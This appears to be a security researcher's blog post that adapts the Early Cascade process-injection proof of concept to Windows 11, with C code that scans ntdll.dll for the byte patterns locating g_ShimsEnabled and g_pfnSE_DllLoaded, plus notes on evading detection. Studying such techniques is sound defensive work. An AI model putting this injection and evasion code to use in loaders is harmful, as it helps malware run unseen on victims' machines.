Early Cascade Injection

learning about early cascade injection, fixing for Win11, disassembly nonsense

Intro

Early Cascade injection was documented by Outflank as a novel process injection technique. The technique requires locating and modifying specific symbols in the .data and .mrdata sections of ntdll.dll in a remote process, which enables code execution via a callback routine.

This blog post will not go into all of the details of the technique, since it was covered in the original research blog post.

Instead, this blog post will cover how I played with the proof-of-concept code from @5pider and reversed a method to find offsets needed to execute on Windows 11 targets.

Here is my very simplified overview of the steps performed during the injection method:

  1. Spawn a process in a suspended state.
  2. Locate the offsets to g_ShimsEnabled & g_pfnSE_DllLoaded inside of ntdll.dll.
  3. Set the g_ShimsEnabled boolean to 1 (true) in the suspended process.
  4. Overwrite the function pointer g_pfnSE_DllLoaded with the address of a shellcode stub.
  5. Resume the thread.
  6. The shellcode stub immediately flips g_ShimsEnabled back to 0 (false).
  7. The shellcode stub queues an APC routine, which executes after the LdrInitializeThunk routine.

Finding Offsets

A crucial step for this injection technique is the ability to locate the addresses of:

  • g_ShimsEnabled boolean value
  • g_pfnSE_DllLoaded function pointer

g_pfnSE_DllLoaded is located in the .mrdata section and g_ShimsEnabled is in the .data section of ntdll.dll.

I found this helper function on Twitter from @m4ul3r_0x00 to help locate the memory addresses of those values in order to modify them later.

VOID FindOffsets()
{
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
    if (!ptr) {
        printf("[!] Failed to locate RtlQueryDepthSList\n");
        return;
    }

    // Scan memory until end of LdrpInitShimEngine (bytes C3 CC: ret followed by int3 padding, read as 0xCCC3 little-endian)
    while (i != 2) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    // Scan memory until 0x488B3D pattern (mov rdi, qword [rel g_pfnSE_DllLoaded])
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Skip the 3 opcode bytes (48 8B 3D) and read the 32-bit relative offset
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Offset is relative to the next instruction (ptr + 7): absolute address of g_pfnSE_DllLoaded

    // Scan memory until 0x443825 pattern (cmp byte [rel g_ShimsEnabled], r12b)
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x253844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);           // Skip the 3 opcode bytes (44 38 25) and read the 32-bit relative offset
    g_ShimsEnabled = ptr + offset2 + 7;     // Offset is relative to the next instruction (ptr + 7): absolute address of g_ShimsEnabled (1-byte boolean)
}

Here is a breakdown of the function:

  • Finding g_pfnSE_DllLoaded
    • The first while loop moves the pointer to the end of the LdrpInitShimEngine function by matching the bytes C3 CC (a ret followed by int3 padding), which usually mark the end of a function. The code compares against 0xCCC3 because the 16-bit read is little-endian.
    • The next while loop searches for the instruction mov rdi, qword [rel g_pfnSE_DllLoaded]. It compares only the first 3 bytes (48 8B 3D) by applying the mask 0xFFFFFF.
    • At that point the pointer is 3 bytes away from the 32-bit relative offset of g_pfnSE_DllLoaded.
    • Reading the relative offset at ptr + 3 and adding it to the address of the next instruction (ptr + 7, since the instruction is 7 bytes long) gives the absolute address of g_pfnSE_DllLoaded.
// [ptr is here now] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3);               // Skip the 3 opcode bytes and read the 32-bit relative offset
g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Absolute address of g_pfnSE_DllLoaded (offset is relative to ptr + 7)
  • Finding g_ShimsEnabled
    • The last while loop searches for the byte pattern of the instruction cmp byte [rel g_ShimsEnabled], r12b (remember this for later 😉).
    • After it finds the pattern, it does the same as above and calculates the absolute address of g_ShimsEnabled.
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3);           // Skip the 3 opcode bytes and read the 32-bit relative offset
g_ShimsEnabled = ptr + offset2 + 7;     // Absolute address of g_ShimsEnabled (1-byte boolean)

After the memory addresses for these global symbols are located, the rest of the cascade injection technique can continue.
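The address arithmetic above is easier to follow in isolation. Here is a minimal sketch of it that runs on a plain byte buffer instead of a live ntdll.dll. The helper name resolve_rip_relative and its parameters are my own and are not part of the PoC. One assumption that differs from the PoC: x86-64 displacements are signed, so the sketch reads the value as int32_t instead of ULONG.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper (not from the PoC): resolve the target of a
 * RIP-relative operand.
 *   insn_addr : address the instruction has in memory
 *   insn      : pointer to the instruction bytes
 *   disp_off  : offset of the 4-byte displacement inside the instruction
 *   insn_len  : total instruction length (RIP points past the instruction)
 */
static uint64_t resolve_rip_relative(uint64_t insn_addr, const uint8_t *insn,
                                     size_t disp_off, size_t insn_len)
{
    int32_t disp;

    assert(insn != NULL && disp_off + sizeof(disp) <= insn_len);

    /* memcpy avoids an unaligned read; assumes a little-endian host. */
    memcpy(&disp, insn + disp_off, sizeof(disp));

    /* target = address of the next instruction + signed displacement */
    return insn_addr + insn_len + (uint64_t)(int64_t)disp;
}
```

For example, the bytes 48 8B 3D 10 20 00 00 placed at address 0x1000 carry the displacement 0x2010, so the operand resolves to 0x1000 + 7 + 0x2010 = 0x3017. Both instructions used in this post are 7 bytes long with the displacement at offset 3, which is where the "+ 3" and "+ 7" in the PoC come from.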

The Problem

This code worked fine when I tested on Windows 10, but failed on Windows 11 😢.

I decided to try and ‘fix’ this to also work on Windows 11.

My hypothesis:

The memory signatures inside of ntdll.dll in this PoC are probably not exactly the same on Windows 11, so the code fails to locate either g_ShimsEnabled or g_pfnSE_DllLoaded or both.

Let’s Fix It ⚒️

In order for this injection method to work on Windows 11 we have to reproduce the methodology above or come up with a more reliable method of locating the addresses.

Debugging NTDLL.DLL

So I loaded ntdll.dll into Binary Ninja on a Windows 11 machine with debug symbols to start analyzing the PE file.

As you saw in the function above, it first gets the address of the exported function RtlQueryDepthSList.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
    printf("[!] Failed to locate RtlQueryDepthSList\n");
    return;
}

In Binja we can browse to the Symbols tab to view all functions, since the debug symbols are loaded for the DLL. I searched for the function's symbol and clicked into it to start analyzing it.

Great, next the PoC skips past 2 function endings by looking for a ret followed by int3 padding (bytes C3 CC).

// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}

The code was nicely commented, so I knew it expected the pointer to land at the end of LdrpInitShimEngine after this.

Wait! In the screenshot above you can see the 3rd function down is RtlAllocateAndInitializeSid not LdrpInitShimEngine.

The functions in ntdll.dll appear to be in a different order on Windows 11. At least now we know where to begin…

Reversing Original PoC

First I needed to figure out why the PoC chose the end of LdrpInitShimEngine as the function to stop after.

I determined it was chosen because the next function was supposed to be LdrpLoadShimEngine which contains two VERY important instructions in it:

  • mov rdi, qword [rel g_pfnSE_DllLoaded]
  • cmp byte [rel g_ShimsEnabled], r13b

LdrpLoadShimEngine references both of the variables we need by their relative addresses. This means that we can grab those addresses and calculate their absolute addresses in memory.

This is what the function for Win10 does.


So I basically stuck with the original PoC’s methodology to get it working for Win11.

The function will do the following:

  1. Find the closest exported function to LdrpLoadShimEngine.
  2. Get the address of that exported function.
  3. Move the index pointer past ‘x’ number of rets until it’s at LdrpLoadShimEngine.
  4. Look for the byte patterns that reference the variables’ relative addresses.
  5. Calculate their absolute addresses.
  6. Finish the injection steps.

Find the Closest Exported Function

The ntdll.dll library has many exported and non-exported functions. For any exported function we could simply use GetProcAddress in order to get a pointer to the function. But since LdrpLoadShimEngine is not an exported function we have to find the closest exported one and then count forwards (or backwards).

We can start at LdrpLoadShimEngine and count backwards until we see an exported function.

Six (6) rets above it we can see RtlUnlockMemoryBlockLookaside, which is an exported function, meaning we can easily get its address with GetProcAddress.

Now we can update our code to use RtlUnlockMemoryBlockLookaside as the starting function and count 6 rets down to find LdrpLoadShimEngine.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
    printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\n");
    return;
}

// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}
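One thing I noticed about the ret-counting loop is that it has no upper bound, so it keeps reading forever if the expected number of C3 CC pairs never shows up. Below is a hedged sketch of a bounded variant that works on a buffer and returns an offset. The name skip_function_ends and the -1 error convention are my own, and treating C3 CC as "end of function" is still only a heuristic, because the same two bytes can appear inside other instructions or data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper (not from the PoC): walk buf and return the offset
 * of the CC byte of the count-th "C3 CC" pair (ret + int3 padding), which
 * is where the PoC's pointer ends up after its loop. Returns -1 if fewer
 * than count pairs exist within len bytes.
 *
 * Comparing the two bytes individually is equivalent to the PoC's
 * *(PWORD)ptr == 0xCCC3 check on a little-endian machine.
 */
static ptrdiff_t skip_function_ends(const uint8_t *buf, size_t len, unsigned count)
{
    unsigned seen = 0;

    assert(buf != NULL);

    if (count == 0)
        return 0;

    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xC3 && buf[i + 1] == 0xCC) {
            if (++seen == count)
                return (ptrdiff_t)(i + 1);
        }
    }
    return -1; /* ran out of bytes before finding enough function endings */
}
```

With a length limit in place, a wrong starting export or a changed function layout produces a clean failure instead of a crash or an endless scan.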

Fixing Byte Signature

Now there is just one more thing to address. I found while analyzing LdrpLoadShimEngine that Win11 uses a different register for the cmp instruction.

// Windows 10
cmp     byte [rel g_ShimsEnabled], r12b
// Windows 11
cmp     byte [rel g_ShimsEnabled], r13b

Win10 uses r12b but Win11 uses r13b. This means that the pattern matching logic from the PoC will fail to find the correct address since the bytes are different.

We can easily update the code to check for 0x44382D instead of 0x443825.

while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
    ptr++;
}
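The only difference between the two signatures is the third byte (25 vs 2D). That byte is the ModRM byte, and the register is encoded in its middle three bits. As a sketch of a check that accepts either register, the register bits can be masked out before comparing. The function names are my own, and I have not verified that this wider pattern is unique inside LdrpLoadShimEngine on every build, so treat it as an idea, not a drop-in fix.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper (not from the PoC): returns 1 if p points at
 * "cmp byte [rip + disp32], r8b..r15b":
 *   44     REX prefix with only REX.R set (selects r8b..r15b)
 *   38     CMP r/m8, r8
 *   ModRM  mod = 00, rm = 101 (RIP-relative), reg = any value
 * The mask 0xC7 keeps the mod and rm bits and drops the reg bits.
 */
static int is_cmp_riprel_high_byte_reg(const uint8_t *p, size_t remaining)
{
    assert(p != NULL);

    if (remaining < 7) /* 3 opcode bytes + 4 displacement bytes */
        return 0;

    return p[0] == 0x44 && p[1] == 0x38 && (p[2] & 0xC7) == 0x05;
}

/* Register number encoded in the ModRM reg field: 12 for r12b, 13 for r13b. */
static unsigned cmp_reg_number(const uint8_t *p)
{
    assert(p != NULL);
    return 8u + ((p[2] >> 3) & 7u);
}
```

Decoding the two bytes from this post: 0x25 has reg = 4, which REX.R turns into r12b (Win10), and 0x2D has reg = 5, which becomes r13b (Win11).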

Final Thoughts

After making those changes to the function I was able to successfully execute the injection method on Windows 11.

The final updated function looks like this:

// Values to overwrite in NTDLL
PVOID g_pfnSE_DllLoaded = NULL;
PVOID g_ShimsEnabled = NULL;

/*
* Locate g_ShimsEnabled and g_pfnSE_DllLoaded on Windows 11 
*/
VOID FindOffsetsWin11()
{
/*
    On Windows 11, functions are ordered differently inside ntdll.
    We want to find RtlUnlockMemoryBlockLookaside because it's the closest exported function to
    LdrpLoadShimEngine (which contains the instructions we want).
*/
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
    if (!ptr) {
        printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\n");
        return;
    }
    
    // Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
    while (i != 6) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x488B3D  (mov     rdi, qword [rel g_pfnSE_DllLoaded])
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Skip the 3 opcode bytes (48 8B 3D) and read the 32-bit relative offset
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Offset is relative to the next instruction (ptr + 7): absolute address of g_pfnSE_DllLoaded

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x44382D  (cmp     byte [rel g_ShimsEnabled], r13b)
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r13b
    offset2 = *(PULONG)(ptr + 3);           // Skip the 3 opcode bytes (44 38 2D) and read the 32-bit relative offset
    g_ShimsEnabled = ptr + offset2 + 7;     // Offset is relative to the next instruction (ptr + 7): absolute address of g_ShimsEnabled (1-byte boolean)
}

Improvements

I had the AI wizard generate me a function to determine the Windows version then execute the correct FindOffsets function.
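That generated function is not reproduced here, but the decision it has to make is small. Below is a minimal sketch of the selection logic only, written by hand for illustration. The os_version struct, the scan_profile enum, and pick_scan_profile are hypothetical names, and I am assuming the version numbers were already obtained elsewhere (for example via RtlGetVersion). The one fact it relies on is that Windows 11 still reports major version 10 and is told apart by a build number of 22000 or higher.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical types for illustration, not from the PoC. */
typedef struct {
    uint32_t major;
    uint32_t minor;
    uint32_t build;
} os_version;

typedef enum {
    SCAN_PROFILE_UNKNOWN = 0,
    SCAN_PROFILE_WIN10,   /* would map to FindOffsets()      */
    SCAN_PROFILE_WIN11    /* would map to FindOffsetsWin11() */
} scan_profile;

/*
 * Pick which signature set to use from an already-queried OS version.
 * Windows 10 and Windows 11 both report major version 10, so the build
 * number is what separates them.
 */
static scan_profile pick_scan_profile(const os_version *v)
{
    assert(v != NULL);

    if (v->major != 10)
        return SCAN_PROFILE_UNKNOWN;

    return (v->build >= 22000) ? SCAN_PROFILE_WIN11 : SCAN_PROFILE_WIN10;
}
```

Keep in mind that I only tested the signatures on my own Windows 10 and Windows 11 machines, so a build-number check like this says which function to try, not that the byte patterns will match on that build.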

Some improvements to this code could be:

  • Avoid suspicious WinAPI calls (GetProcAddress, GetModuleHandleA, WriteProcessMemory, ResumeThread)
  • More reliable method of locating the symbols in NTDLL

The final code can be found on my GitHub here.

Credits